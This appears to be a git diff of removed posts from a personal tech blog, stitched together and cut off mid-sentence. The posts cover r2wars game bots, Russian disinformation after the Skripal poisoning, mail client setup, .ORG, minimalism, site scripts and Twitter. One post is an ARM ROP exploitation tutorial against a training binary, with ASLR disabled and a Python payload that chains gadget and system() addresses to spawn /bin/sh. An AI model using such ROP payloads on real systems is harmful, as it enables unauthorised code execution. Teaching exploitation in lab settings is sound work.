- 13 September, 2020 - -My submissions for r2wars 2020 - -If I learnt one thing, it's that ARM is the future - - [1]r2wars is a [2]CoreWar-like game thar runs within the radare2 - [3]ESIL virtual machine. In short, you have two programs running in a - shared memory space (1kb), with the goal of killing the other and - surviving as long as possible. r2wars was conducted as a part of - [4]r2con2020. - -day 1 - - My first submission was an incredibly simple "bomber". All it does is - write code to a location, jump there, and continue executing the same - thing over and over. -mov eax, 0xfeebfeeb; just some bad jumps -mov ebx, eax -mov ecx, eax -mov edx, eax -mov ebp, eax -mov edi, eax -mov esp, 0x3fc -mov esi, 0x3fd -mov [esi], 0xe6ff60 -jmp esi - - Specifically, it writes 0xe6ff60, which is -pushal -jmp esi - - effectively looping over and over. pushal is a very interesting x86 - instruction, that pushes all the registers and decrements the stack - pointer esp by how many ever bytes were pushed. Nifty, especially if - you're looking for high throughput (to bomb the address space). Here, - it starts bombing from 0x3fc - 0x000 (and below, because there's no - bounds checking in place), and ends up killing itself, since writing - outside of the arena (0x000 - 0x400) is illegal. - - Ultimately, this bot placed 7th out of 9 contestants -- an - underwhelming outcome. I had to fix this. - - day 1 - -day 2 - - I sat for a second and recollected the different reasons for my bot - getting killed, and the one that occurred the most was my bot - insta-dying to bad instructions being written from 0x400 -- i.e. from - near where I'm positioned. Nearly all competing bots write from bottom - up, because pushal decrements the stack pointer. So the obvious - solution was to reposition my initial payload way above, at 0x000. And - of course, it goes without saying that this assumes everyone's using - pushal (they are). -mov eax, 0xffffffff -mov ecx, eax -mov edx, eax -mov ebx, eax -mov ebp, eax -mov esi, eax - -check: - mov edi, 0x000 - cmp [edi], 0 - jne planb - mov esp, 0x400 - inc edi - mov [edi], 0xe7ff6060; pushal, jmp edi - jmp edi - -planb: - mov edi, 0x3fb - mov [edi], 0xe7ff6060 - mov esp, 0x3fa - jmp edi - - I also added a (pretty redundant) check to see if the stuff at edi was - 0, since the entire arena is initially 0x0. My reasoning, albeit - flawed, was that if it wasn't 0, then it was unsafe to go there. In - hindsight, it would've been safer, since it's already been written over - by somebody. In any case, planb never got executed because of what I'd - mentioned earlier -- everyone writes from 0x400. Or anywhere above - 0x000, for that matter. So I'm relatively safer than I was in day 1. - - These changes paid off, though. I placed 4th on day 2, out of 13 - contestants! This screenshot was taken on my phone as I was eating - dinner. - - day 2 - - All wasn't well though -- I still lost 4 matches, for the reasons - below: - 1. I'd get snuffed out before my bomb wave from 0x400 would reach the - opponent. - 2. I'd end up bombing myself without hitting anyone on the way up. - -day 3 - - I needed to add some checks to prevent killing myself in the process of - bombing. -mov eax, 0xffffffff -mov ecx, eax -mov edx, eax -mov ebx, eax -mov ebp, eax -mov esi, eax - -mov edi, 0x000 -mov esp, 0x400 -mov [edi], 0x20fc8360 -mov [edi+4], 0xff600374 -mov [edi+8], 0x0400bce7 -mov [edi+12], 0xe7ff0000 -jmp edi - - If you noticed, the initial payload I'm writing to the address at edi - is a bit more complex this time -- let's break it down. -0x20fc8360 -0xff600374 -0x0400bce7 -0xe7ff0000 - - This translates to: -60 pushal -83 FC 20 cmp esp, 0x20 -74 03 je 9 -60 pushal -FF E7 jmp edi -BC 04 00 00 00 mov esp, 0x400; <- 0x9 -FF E7 jmp edi - - I check if the stack pointer is 0x20 (decrements from 0x400 due to - pushal); if yes, reset to 0x400, else continue looping. This prevented - me from writing myself over, and also resets bombing from 0x400 -- - better chance of hitting someone we missed in our first wave. - - Sounds good? That's what I thought too. Day 3 had a bunch of new bot - submissions (and some updated submissions), and a lot of them checked - 0x000 for existence of a bot, effectively recking me. I placed 8th out - of 14 contestants, with 7 wins and 6 losses. Tough day. - - day 3 - -day 4: the finals - - I spent a lot of time refactoring my bot. I tried all kinds of things, - even reworked it to be entirely mobile using the pushal + jmp esp - trick, but I just wasn't satisfied. In the end, I decided to address - the problem in the simplest way possible. You're checking 0x000? Okay, - I'll reposition my initial payload to 0xd. - - And this surprisingly tiny change landed me in 4th place out of 15 - contestants, which was way better than I'd anticipated! The top spots - were all claimed by ARM, and naturally so -- they had a potential - throughput of 64 bytes per cycle thanks to stmia, compared to x86's 32 - bytes. Pretty neat! - - day 4 - -links and references - - * [5]Anisse's r2wars 2019 post - * [6]Emile's intro to r2wars - * [7]How not to suck at r2wars - * [8]r2wars: Shall we play a game? - * [9]Shell Storm's online (dis)assembler - * [10]radare2 - * [11]r2wars game engine - * [12]Anisse's bot workspace - * [13]My bot dev workspace - * [14]r2con YouTube - -closing thoughts - - This was my first ever r2wars, and it was an incredible experience. Who - woulda thunk staring at colored boxes on the screen would be so much - fun?! So much so that my parents walked over to see what all the fuss - was about. Shoutout to [15]Abel and [16]pancake for taking the time out - to work on this, and especially Abel for dealing with all the last - minute updates and bot submissions! - - All things said, mine was still the best x86 bot -- so that's a win. ;) - -References - - 1. https://github.com/radareorg/r2wars - 2. http://corewars.org/ - 3. https://radare.gitbooks.io/radare2book/content/disassembling/esil.html - 4. https://rada.re/con/2020 - 5. https://anisse.astier.eu/r2wars-2019.html - 6. https://www.tildeho.me/r2wars/ - 7. https://bananamafia.dev/post/r2wars-2019/ - 8. https://ackcent.com/r2wars-shall-we-play-a-game/ - 9. http://shell-storm.org/online/Online-Assembler-and-Disassembler - 10. https://github.com/radareorg/radare2 - 11. https://github.com/radareorg/r2wars - 12. https://github.com/anisse/r2warsbots - 13. https://github.com/icyphox/r2wars-bots - 14. https://www.youtube.com/channel/UCZo6gyBPj6Vgg8u2dfIhY4Q - 15. https://twitter.com/sanguinawer - 16. https://twitter.com/trufae
@@ -1,220 +0,0 @@
- 06 June, 2019 - -Return Oriented Programming on ARM (32-bit) - -Making stack-based exploitation great again! - - Before we start anything, you're expected to know the basics of ARM - assembly to follow along. I highly recommend [1]Azeria's series on - [2]ARM Assembly Basics. Once you're comfortable with it, proceed with - the next bit -- environment setup. - -Setup - - Since we're working with the ARM architecture, there are two options to - go forth with: - 1. Emulate -- head over to [3]qemu.org/download and install QEMU. And - then download and extract the ARMv6 Debian Stretch image from one - of the links [4]here. The scripts found inside should be - self-explanatory. - 2. Use actual ARM hardware, like an RPi. - - For debugging and disassembling, we'll be using plain old gdb, but you - may use radare2, IDA or anything else, really. All of which can be - trivially installed. - - And for the sake of simplicity, disable ASLR: -$ echo 0 > /proc/sys/kernel/randomize_va_space - - Finally, the binary we'll be using in this exercise is [5]Billy Ellis' - [6]roplevel2. - - Compile it: -$ gcc roplevel2.c -o rop2 - - With that out of the way, here's a quick run down of what ROP actually - is. - -A primer on ROP - - ROP or Return Oriented Programming is a modern exploitation technique - that's used to bypass protections like the NX bit (no-execute bit) and - code sigining. In essence, no code in the binary is actually modified - and the entire exploit is crafted out of pre-existing artifacts within - the binary, known as gadgets. - - A gadget is essentially a small sequence of code (instructions), ending - with a ret, or a return instruction. In our case, since we're dealing - with ARM code, there is no ret instruction but rather a pop {pc} or a - bx lr. These gadgets are chained together by jumping (returning) from - one onto the other to form what's called as a ropchain. At the end of a - ropchain, there's generally a call to system(), to acheive code - execution. - - In practice, the process of executing a ropchain is something like - this: - * confirm the existence of a stack-based buffer overflow - * identify the offset at which the instruction pointer gets - overwritten - * locate the addresses of the gadgets you wish to use - * craft your input keeping in mind the stack's layout, and chain the - addresses of your gadgets - - [7]LiveOverflow has a [8]beautiful video where he explains ROP using - "weird machines". Check it out, it might be just what you needed for - that "aha!" moment :) - - Still don't get it? Don't fret, we'll look at actual exploit code in a - bit and hopefully that should put things into perspective. - -Exploring our binary - - Start by running it, and entering any arbitrary string. On entering a - fairly large string, say, "A" 20, we see a segmentation fault occur. - - string and segfault - - Now, open it up in gdb and look at the functions inside it. - - gdb functions - - There are three functions that are of importance here, main, winner and - gadget. Disassembling the main function: - - gdb main disassembly - - We see a buffer of 16 bytes being created (sub sp, sp, #16), and some - calls to puts()/printf() and scanf(). Looks like winner and gadget are - never actually called. - - Disassembling the gadget function: - - gdb gadget disassembly - - This is fairly simple, the stack is being initialized by pushing {r11}, - which is also the frame pointer (fp). What's interesting is the pop - {r0, pc} instruction in the middle. This is a gadget. - - We can use this to control what goes into r0 and pc. Unlike in x86 - where arguments to functions are passed on the stack, in ARM the - registers r0 to r3 are used for this. So this gadget effectively allows - us to pass arguments to functions using r0, and subsequently jumping to - them by passing its address in pc. Neat. - - Moving on to the disassembly of the winner function: - - gdb winner disassembly - - Here, we see a calls to puts(), system() and finally, exit(). So our - end goal here is to, quite obviously, execute code via the system() - function. - - Now that we have an overview of what's in the binary, let's formulate a - method of exploitation by messing around with inputs. - -Messing around with inputs :^) - - Back to gdb, hit r to run and pass in a patterned input, like in the - screenshot. - - gdb info reg post segfault - - We hit a segfault because of invalid memory at address 0x46464646. - Notice the pc has been overwritten with our input. So we smashed the - stack alright, but more importantly, it's at the letter `F'. - - Since we know the offset at which the pc gets overwritten, we can now - control program execution flow. Let's try jumping to the winner - function. - - Disassemble winner again using disas winner and note down the offset of - the second instruction -- add r11, sp, #4. For this, we'll use Python - to print our input string replacing FFFF with the address of winner. - Note the endianness. -$ python -c 'print("AAAABBBBCCCCDDDDEEEE\x28\x05\x01\x00")' | ./rop2 - - jump to winner - - The reason we don't jump to the first instruction is because we want to - control the stack ourselves. If we allow push {rll, lr} (first - instruction) to occur, the program will pop those out after winner is - done executing and we will no longer control where it jumps to. - - So that didn't do much, just prints out a string "Nothing much - here...". But it does however, contain system(). Which somehow needs to - be populated with an argument to do what we want (run a command, - execute a shell, etc.). - - To do that, we'll follow a multi-step process: - 1. Jump to the address of gadget, again the 2nd instruction. This will - pop r0 and pc. - 2. Push our command to be executed, say "/bin/sh" onto the stack. This - will go into r0. - 3. Then, push the address of system(). And this will go into pc. - - The pseudo-code is something like this: -string = AAAABBBBCCCCDDDDEEEE -gadget = # addr of gadget -binsh = # addr of /bin/sh -system = # addr of system() - -print(string + gadget + binsh + system) - - Clean and mean. - -The exploit - - To write the exploit, we'll use Python and the absolute godsend of a - library -- struct. It allows us to pack the bytes of addresses to the - endianness of our choice. It probably does a lot more, but who cares. - - Let's start by fetching the address of /bin/sh. In gdb, set a - breakpoint at main, hit r to run, and search the entire address space - for the string "/bin/sh": -(gdb) find &system, +9999999, "/bin/sh" - - gdb finding /bin/sh - - One hit at 0xb6f85588. The addresses of gadget and system() can be - found from the disassmblies from earlier. Here's the final exploit - code: -import struct - -binsh = struct.pack("I", 0xb6f85588) -string = "AAAABBBBCCCCDDDDEEEE" -gadget = struct.pack("I", 0x00010550) -system = struct.pack("I", 0x00010538) - -print(string + gadget + binsh + system) - - - Honestly, not too far off from our pseudo-code :) - - Let's see it in action: - - the shell! - - Notice that it doesn't work the first time, and this is because /bin/sh - terminates when the pipe closes, since there's no input coming in from - STDIN. To get around this, we use cat(1) which allows us to relay input - through it to the shell. Nifty trick. - -Conclusion - - This was a fairly basic challenge, with everything laid out - conveniently. Actual ropchaining is a little more involved, with a lot - more gadgets to be chained to acheive code execution. - - Hopefully, I'll get around to writing about heap exploitation on ARM - too. That's all for now. - -References - - 1. https://twitter.com/fox0x01 - 2. https://azeria-labs.com/writing-arm-assembly-part-1/ - 3. https://www.qemu.org/download/ - 4. https://blahcat.github.io/qemu/ - 5. https://twitter.com/bellis1000 - 6. https://icyphox.sh/static/files/roplevel2.c - 7. https://twitter.com/LiveOverflow - 8. https://www.youtube.com/watch?v=zaQVNM3or7k&list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN&index=46&t=0s
@@ -1,170 +0,0 @@
- 12 December, 2019 - -Disinfo war: RU vs GB - -A look at Russian info ops against Britain - - This entire sequence of events begins with the attempted poisoning of - Sergei Skripal^[1]1, an ex-GRU officer who was a double-agent for the - UK's intelligence services. This hit attempt happened on the 4th of - March, 2018. 8 days later, then-Prime Minister Theresa May formally - accused Russia for the attack. - - The toxin used in the poisoning was a nerve agent called Novichok. In - addition to the British military-research facility at Porton Down, a - small number of labs around the world were tasked with confirming - Porton Down's conclusions on the toxin that was used, by the OPCW - (Organisation for the Prohibition of Chemical Weapons). - - With the background on the matter out of the way, here are the - different instances of well timed disinformation pushed out by Moscow. - -The Russian offense - -April 14, 2018 - - * RT published an article claiming that Spiez had identified a - different toxin -- BZ, and not Novichok. - * This was an attempt to shift the blame from Russia (origin of - Novichok), to NATO countries, where it was apparently in use. - * Most viral piece on the matter in all of 2018. - - Although technically correct, this isn't the entire truth. As part of - protocol, the OPCW added a new substance to the sample as a test. If - any of the labs failed to identify this substance, their findings were - deemed untrustworthy. This toxin was a derivative of BZ. - - Here are a few interesting things to note: - 1. The entire process starting with the OPCW and the labs is - top-secret. How did Russia even know Speiz was one of the labs? - 2. On April 11th, the OPCW mentioned BZ in a report confirming Porton - Down's findings. Note that Russia is a part of OPCW, and are fully - aware of the quality control measures in place. Surely they knew - about the reason for BZ's use? - - Regardless, the Russian version of the story spread fast. They cashed - in on two major factors to plant this disinfo: - 1. "NATO bad" : Overused, but surprisingly works. People love a story - that goes full 180. - 2. Spiez can't defend itself: At the risk of revealing that it was one - of the facilities testing the toxin, Spiez was only able to "not - comment". - -April 3, 2018 - - * The Independent publishes a story based on an interview with the - chief executive of Porton Down, Gary Aitkenhead. - * Aitkenhead says they've identified Novichok but "have not - identified the precise source". - * Days earlier, Boris Johnson (then-Foreign Secretary) claimed that - Porton Down confirmed the origin of the toxin to be Russia. - * This discrepancy was immediately promoted by Moscow, and its - network all over. - - This one is especially interesting because of how simple it is to - exploit a small contradiction, that could've been an honest mistake. - This episode is also interesting because the British actually attempted - damage control this time. Porton Down tried to clarify Aitkenhead's - statement via a tweet^[2]2: - - Our experts have precisely identified the nerve agent as a Novichok. - It is not, and has never been, our responsibility to confirm the - source of the agent @skynews @UKmoments - - Quoting the [3]Defense One article on the matter: - - The episode is seen by those inside Britain's security - communications team as the most serious misstep of the crisis, which - for a period caused real concern. U.K. officials told me that, in - hindsight, Aikenhead could never have blamed Russia directly, - because that was not his job--all he was qualified to do was - identify the chemical. Johnson, in going too far, was more damaging. - Two years on, he is now prime minister. - -May 2018 - - * OPCW facilities receive an email from Spiez inviting them to a - conference. - * The conference itself is real, and has been organized before. - * The email however, was not -- attached was a Word document - containing malware. - * Also seen were inconsistencies in the email formatting, from what - was normal. - - This spearphishing campaign was never offically attributed to Moscow, - but there are a lot of tells here that point to it being the work of a - state actor: - 1. Attack targetting a specific group of individuals. - 2. Relatively high level of sophistication -- email formatting, - malicious Word doc, etc. - - However, the British NCSC have deemed with "high confidence" that the - attack was perpetrated by GRU. In the UK intelligence parlance, "highly - likely" / "high confidence" usually means "definitely". - -Britain's defense - -September 5, 2018 - - The UK took a lot of hits in 2018, but they eventually came back: - * Metropolitan Police has a meeting with the press, releasing their - findings. - * CCTV footage showing the two Russian hitmen was released. - * Traces of Novichok identified in their hotel room. - - This sudden news explosion from Britan's side completely bulldozed the - information space pertaining to the entire event. According to Defense - One: - - Only two of the 10 most viral stories in the weeks following the - announcement were sympathetic to Russia, according to NewsWhip. - Finally, officials recalled, it felt as though the U.K. was the - aggressor. "This was all kept secret to put the Russians on the - hop," one told me. "Their response was all over the place from this - point. It was the turning point." - - Earlier in April, 4 GRU agents were arrested in the Netherlands, who - were there to execute a cyber operation against the OPCW (located in - The Hague), via their WiFi networks. They were arrested by Dutch - security, and later identifed as belonging to Unit 26165. They also - seized a bunch of equipment from the room and their car. - - The abandoned equipment revealed that the GRU unit involved had sent - officers around the world to conduct similar cyberattacks. They had - been in Malaysia trying to steal information about the investigation - into the downed Malaysia Airlines Flight 17, and at a hotel in - Lausanne, Switzerland, where a World Anti-Doping Agency (WADA) - conference was taking place as Russia faced sanctions from the - International Olympic Committee. Britain has said that the same GRU - unit attempted to compromise Foreign Office and Porton Down computer - systems after the Skripal poisoning. - -October 4, 2018 - - UK made the arrests public, published a list of infractions commited by - Russia, along with the specific GRU unit that was caught. - - During this period, just one of the top 25 viral stories was from a - pro-Russian outlet, RT -- that too a fairly straightforward piece. - -Wrapping up - - As with conventional warfare, it's hard to determine who won. Britain - may have had the last blow, but Moscow -- yet again---depicted their - finesse in information warfare. Their ability to seize unexpected - openings, gather intel to facilitate their disinformation campaigns, - and their cyber capabilities makes them a formidable threat. - - 2020 will be fun, to say the least. - __________________________________________________________________ - - 1. [4]https://en.wikipedia.org/wiki/Sergei_Skripal - 2. [5]https://twitter.com/dstlmod/status/981220158680260613 - -References - - 1. https://icyphox.sh/home/icy/leet/site/build/blog/ru-vs-gb/temp.html#fn:skripal - 2. https://icyphox.sh/home/icy/leet/site/build/blog/ru-vs-gb/temp.html#fn:dstltweet - 3. https://www.defenseone.com/threats/2019/12/britains-secret-war-russia/161665/ - 4. https://en.wikipedia.org/wiki/Sergei_Skripal - 5. https://twitter.com/dstlmod/status/981220158680260613
@@ -1,162 +0,0 @@
- 06 May, 2020 - -The S-nail mail client - -And how to achieve a usable configuration for IMAP/SMTP - - TL;DR: Here's my [1].mailrc. - - As I'd mentioned in my blog post about [2]mael, I've been on the - lookout for a good, usable mail client. As it happens, I found S-nail - just as I was about to give up on mael. Turns out writing an MUA isn't - all too easy after all. S-nail turned out to be the perfect client for - me, but I had to invest quite some time in reading the [3]very thorough - manual and exchanging emails with its [4]very friendly author. I did it - so you don't have to^[5]1, and I present to you this guide. - -basic settings - - These settings below should guarantee some sane defaults to get started - with. Comments added for context. -# enable upward compatibility with S-nail v15.0 -set v15-compat - -# charsets we send mail in -set sendcharsets=utf-8,iso-8859-1 - -# reply back in sender's charset -set reply-in-same-charset - -# prevent stripping of full names in replies -set fullnames - -# adds a 'Mail-Followup-To' header; useful in mailing lists -set followup-to followup-to-honour-ask-yes - -# asks for an attachment after composing -set askattach - -# marks a replied message as answered -set markanswered - -# honors the 'Reply-To' header -set reply-to-honour - -# automatically launches the editor while composing mail interactively -set editalong - -# I didn't fully understand this :) -set history-gabby=all - -# command history storage -set history-file=~/.s-nailhist - -# sort mail by date (try 'thread' for threaded view) -set autosort=date - -authentication - - With these out of the way, we can move on to configuring our account -- - authenticating IMAP and SMTP. Before that, however, we'll have to - create a ~/.netrc file to store our account credentials. - - (This of course, assumes that your SMTP and IMAP credentials are the - same. I don't know what to do otherwise. ) -machine *.domain.tld login user@domain.tld password hunter2 - - Once done, encrypt this file using gpg / gpg2. This is optional, but - recommended. -$ gpg2 --symmetric --cipher-algo AES256 -o .netrc.gpg .netrc - - You can now delete the plaintext .netrc file. Now add these lines to - your .mailrc: -set netrc-lookup -set netrc-pipe='gpg2 -qd ~/.netrc.gpg' - - Before we define our account block, add these two lines for a nicer - IMAP experience: -set imap-cache=~/.cache/nail -set imap-keepalive=240 - - Defining an account is dead simple. -account "personal" { - localopts yes - set from="Your Name <user@domain.tld>" - set folder=imaps://imap.domain.tld:993 - - # copy sent messages to Sent; '+' indicates subdir of 'folder' - set record=+Sent - set inbox=+INBOX - - # optionally, set this to 'smtps' and change the port accordingly - # remove 'smtp-use-starttls' - set mta=smtp://smtp.domain.tld:587 smtp-use-starttls - - # couple of shortcuts to useful folders - shortcut sent +Sent \ - inbox +INBOX \ - drafts +Drafts \ - trash +Trash \ - archives +Archives -} - -# enable account on startup -account personal - - You might also want to trash mail, instead of perma-deleting them - (delete does that). To achieve this, we define an alias: -define trash { - move "$@" +Trash -} - -commandalias del call trash - - Replace +Trash with the relative path to your trash folder. - -aesthetics - - The fun stuff. I don't feel like explaining what these do (hint: I - don't fully understand it either), so just copy-paste it and mess - around with the colors: -# use whatever symbol you fancy -set prompt='> ' - -colour 256 sum-dotmark ft=bold,fg=13 dot -colour 256 sum-header fg=007 older -colour 256 sum-header bg=008 dot -colour 256 sum-header fg=white -colour 256 sum-thread bg=008 dot -colour 256 sum-thread fg=cyan - - The prompt can be configured more extensively, but I don't need it. - Read the man page if you do. - -essential commands - - Eh, you can just read the man page, I guess. But here's a quick list - off the top of my head: - * headers: Lists all messages, with the date, subject etc. - * mail: Compose mail. - * <number>: Read mail by specifiying its number on the message list. - * delete <number>: Delete mail. - * new <number>: Mark as new (unread). - * file <shortcut or path to folder>: Change folders. For example: - file sent - - That's all there is to it. - - This is day 2 of the #100DaysToOffload challenge. I didn't think I'd - participate, until today. So yesterday's post is day 1. Will I keep at - it? I dunno. We'll see. - __________________________________________________________________ - - 1. Honestly, read the man page (and email Steffen!) -- there's a ton - of useful options in there. - -References - - 1. https://github.com/icyphox/dotfiles/blob/master/home/.mailrc - 2. https://icyphox.sh/blog/mael - 3. https://www.sdaoden.eu/code-nail.html - 4. https://www.sdaoden.eu/ - 5. https://icyphox.sh/home/icy/leet/site/build/blog/s-nail/temp.html#fn:read-man
@@ -1,63 +0,0 @@
- 23 November, 2019 - -Save .ORG! - -PIR is getting sold to a private firm, and here's why it's bad - - The .ORG top-level domain introduced in 1985, has been operated by the - [1]Public Interest Registry since - 1. The .ORG TLD is used primarily by communities, free and open source - projects, and other non-profit organizations -- although the use of - the TLD isn't restricted to non-profits. - - The Internet Society or ISOC, the group that created the PIR, has - decided to sell the registry over to a private equity firm -- Ethos - Capital. - -What's the problem? - - There are around 10 million .ORG TLDs registered, and a good portion of - them are non-profits and non-governmental organizations. As the name - suggests, they don't earn any profits and all their operations rely on - a thin inflow of donations. A private firm having control of the .ORG - domain gives them the power to make decisions that would be - unfavourable to the .ORG community: - * They control the registration/renewal fees of the TLD. They can - hike the price if they wish to. As is stands, NGOs already earn - very little -- a .ORG price hike would put them in a very icky - situation. - * They can introduce [2]Rights Protection Mechanisms or RPMs, which - are essentially legal statements that can -- if not correctly - developed -- jeopardize / censor completely legal non-profit - activities. - * Lastly, they can suspend domains at the whim of state actors. It - isn't news that nation states go after NGOs, targetting them with - allegations of illegal activity. The registry being a private firm - only simplifies the process. - - Sure, these are just "what ifs" and speculations, but the risk is real. - Such power can be abused and this would be severly detrimental to NGOs - globally. - -How can I help? - - We need to get the ISOC to stop the sale. Head over to - [3]https://savedotorg.org and sign their letter. An email is sent on - your behalf to: - * Andrew Sullivan, CEO, ISOC - * Jon Nevett, CEO, PIR - * Maarten Botterman, Board Chair, ICANN - * Gran Marby, CEO, ICANN - -Closing thoughts - - The Internet that we all love and care for is slowly being subsumed by - megacorps and private firms, who's only motive is to make a profit. The - Internet was meant to be free, and we'd better act now if we want that - freedom. The future looks bleak -- I hope we aren't too late. - -References - - 1. https://en.wikipedia.org/wiki/Public_Interest_Registry - 2. https://www.icann.org/resources/pages/rpm-drp-2017-10-04-en - 3. https://savedotorg.org/
@@ -1,53 +0,0 @@
- 07 May, 2020 - -Simplicity (mostly) guarantees security - -This is why I meme mnmlsm so much - - Although it is a very comfy one, it's not just an aesthetic. Simplicity - and minimalism, in technology, is great for security too. I say - "mostly" in the title because human error cannot be discounted, and - nothing is perfect. However, the simpler your tech stack is, it is - inherentely more secure than complex monstrosities. - - Let's look at systemd, for example. It's got over 1.2 million lines of - code. "Hurr durr but LoC doesn't mean anything!" Sure ok, but can you - imagine auditing this? How many times has it even been audited? I - couldn't find any audit reports. No, the developers are not security - engineers and a trustworthy audit must be done by a third-party. What's - scarier, is this thing runs on a huge percentage of the world's - critical infrastructure and contains privileged core subsystems. - - "B-but Linux is much bigger!" Indeed, it is, but it has a thousand - times (if not more) the number of eyes looking at the code, and there - have been multiple third-party audits. There are hundreds of - independent orgs and multiple security teams looking at it. That's not - the case with systemd -- it's probably just RedHat. - - Compare this to a bunch of shell scripts. Agreed, writing safe shell - can be hard and there are a ton of weird edge-cases depending on your - shell implementation, but the distinction here is you wrote it. Which - means, you can identify what went wrong -- things are predictable. - systemd, however, is a large blackbox, and its state at runtime is - largely unprovable and unpredictable. I am certain even the developers - don't know. - - And this is why I whine about complexity so much. A complex, - unpredictable system is nothing more than a large attack surface. Drew - DeVault, head of [1]sourcehut wrote something similar (yes that's the - link, yes it has a typo).: - - [2]https://sourcehut.org/blog/2020-04-20-prioritizing-simplitity/ - - He manually provisions all sourcehut infrastructure, because tools like - Salt, Kubernetes etc. are just like systemd in our example -- large - monstrosities which can get you RCE'd. Don't believe me? See [3]this. - - This was day 3 of the #100DaysToOffload challenge. It came out like a - systemd-hate post, but really, I couldn't think of a better example. - -References - - 1. https://sourcehut.org/ - 2. https://sourcehut.org/blog/2020-04-20-prioritizing-simplitity/ - 3. https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/
@@ -1,93 +0,0 @@
- 27 May, 2020 - -Site changes - -New stuff at the {back,front}end - - The past couple of days, I've spent a fair amount of time tweaking this - site. My site's build process involves [1]vite and a bunch of - [2]scripts. These scripts are executed via vite's pre- and post-build - actions. The big changes that were made were performance improvements - in the update_index.py script, and the addition of openring.py, which - you can see at the very bottom of this post! - -speeding up index page generation - - The old script -- the one that featured in [3]Hacky scripts -- was - absolutely ridiculous, and not to mention super slow. Here's what it - did: - * got the most recent file (latest post) by sorting all posts by - mtime. - * parsed the markdown frontmatter and created a markdown table entry - like: - -line = f"| [{meta['title']}]({url}) | `{meta['date']}` |" - - * updated the markdown table (in _index.md) by in-place editing the - markdown, with the line created earlier -- for the latest post. - * finally, I'd have to rebuild the entire site since this markdown - hackery would happen at the very end of the build, i.e, didn't - actually get rendered itself. - - That...probably didn't make much sense to you, did it? Don't bother. I - don't know what I was thinking when I wrote that mess. So with how it - was done aside, here's how it's done now: - * the metadata for all posts are nicely fetched and sorted using - python-frontmatter. - * the metadata list is fed into Jinja for use in templating, and is - rendered very nicely using a simple for expression: {% for p in - posts %} <tr> <td align="left"><a href="/blog/{{ p.url }}">{{ - p.title }}</a></td> <td align="right">{{ p.date }}</td> </tr> {% - endfor %} - - A neat thing I learnt while working with Jinja, is you can use - DebugUndefined in your jinja2.Environment definition to ignore - uninitialized template variables. Jinja's default behaviour is to - remove all uninitialized variables from the template output. So for - instance, if you had: -<body> - {{ body }} -</body> - -<footer> - {{ footer }} -</footer> - - And only {{ body }} was initialized in your template.render(body=body), - the output you get would be: -<body> - Hey there! -</body> -<footer> - -</footer> - - This is annoying if you're attempting to generate your template across - multiple stages, as I was. Now, I initialize my Jinja environment like - so: -from jinja2 import DebugUndefined - -env = jinja2.Environment(loader=template_loader,undefined=DebugUndefined) - - I use the same trick for openring.py too. Speaking of...let's talk - about openring.py! - -the new webring thing at the bottom - - After having seen Drew's [4]openring, my [5]NIH kicked in and I wrote - [6]openring.py. It pretty much does the exact same thing, except it's a - little more composable with vite. Currently, it reads a random sample - of 3 feeds from a list of feeds provided in a feeds.txt file, and - updates the webring with those posts. Like a feed-bingo of sorts. ;) - - I really like how it turned out -- especially the fact that I got my - CSS grid correct in the first try! - -References - - 1. https://github.com/icyphox/vite - 2. https://github.com/icyphox/site/tree/master/bin - 3. https://icyphox.sh/blog/hacky-scripts - 4. https://git.sr.ht/~sircmpwn/openring - 5. https://en.wikipedia.org/wiki/Not_invented_here - 6. https://github.com/icyphox/openring.py
@@ -1,121 +0,0 @@
- 03 August, 2020 - -Some thoughts on Twitter - -I've begun avoiding Twitter, here's why - - This post has been a long time coming. Earlier this year, I decided to - not actively participate on Twitter, and stick to the fediverse - primarily. This has been quite possibly the best decision I've made, - with regard to curating my social / informational feeds -- apart from - [1]not reading news. I'll try to gloss over some reasons as to why I - dislike Twitter as a platform, in this post. Bear in mind, these are - based on my experiences and YMMV. - -filter bubbles and radicalization - - I think this can be said about any social network, but the way that - Twitter is designed only further enables this phenomenon. The more you - interact / show interest in a specific topic, the more you see of the - same -- in terms of suggested accounts to follow, notifications/email - telling you XYZ tweeted this (you probably don't even follow XYZ). - - I've experienced this first hand. I created an alt and followed a few - prominent right-wing accounts (for science!), and within a day or two, - my notifications and inbox were filled with similar accounts & tweets. - - This, as a result, means the user is much more likely to see content - similar to their own perspectives -- a filter bubble. The user is - effectively isolated in their own ideological bubbles. Consequentially, - any form of disagreement that occurs is tossed aside as the other - party's flaw. Surely they wouldn't hold that perspective if they could - see things your way! It's their ignorance! - - One might argue, however, that they do in fact see a lot of opposing - viewpoints in their feed. After all, most of mainstream discourse on - Twitter is just derisive tweets by proponents of either side^[2]1, at - each other. The left quote-tweeting the right and vice versa, for - example. In fact, this is pretty much all that today's "news" is about - -- constant, endless rebuttals to the other's perspective. I still - think this is filter bubbling -- the constant reaffirmation of your - ideologies, by taking potshots at the other side. - - And what does constant exposure to a singular viewpoint lead to? That's - right, radicalization. I won't get into too much detail -- there really - isn't much to say. I'll just add that I know of a few cases IRL, where - within little over a year of having created a Twitter account the - person's political and ideological positions became hard lines -- and - they now straight up refuse to look at things any other way. This is by - no means a scientific conclusion; there are various other influencing - factors, but my point still stands. - -favors mistakes over apologies - - Twitter's design is plagued with flaws, but this one takes the cake. If - you screw up or tweet something incorrect, and it happens to go viral, - there's literally no good way to publish a correction / apology. - Quoting the fantastic article by Nick Punt on [3]deescalating conflict - on social media: - - If we ignore replies, the simple amplification effects of likes, - replies, retweets, and subtweets leave us exposed and the situation - can get out of hand. If we delete and post another, people are - unlikely to see our follow-up, as corrections are rarely viral. - Similarly, even if we reply, only our viral mistake will be seen in - the feed of others. - -too much USPOL - - This might be a non-issue for US residents, but gosh is it irritating - to see US politics literally everywhere. I'm of the opinion that USPOL - is given an unfair amount of attention in mainstream discourse -- to - the point where it overshadows everything else, and Twitter is no - exception. - -generally unhealthy discourse - - If you take a close look at the overarching theme of most Tweets, or - even just the popular ones -- you'll notice a fairly negativist outlook - across most, if not all of them. The [4]r/2meirl4meirl kind.^[5]2 This - is a very unhealthy environment to socialize in. Constantly brooding - over things you can't really affect is quite pointless. - - Another general theme is the constant need for one-upping the other -- - the never-ending contest of who's going to post the most clever - comeback. For what? For the likes and retweets, of course. This is also - what most of "cancel culture" is really about -- pick a target, post - screenshots, add a snide remark: voil, you have a somewhat popular - tweet. - -why don't you just curate your feed then bro? - - Yeah, no. I've tried. The problem is, following someone for the - technical content doesn't imply they're constantly only going to post - that -- and that's their prerogative. And Twitter's annoying "XYZ liked - this 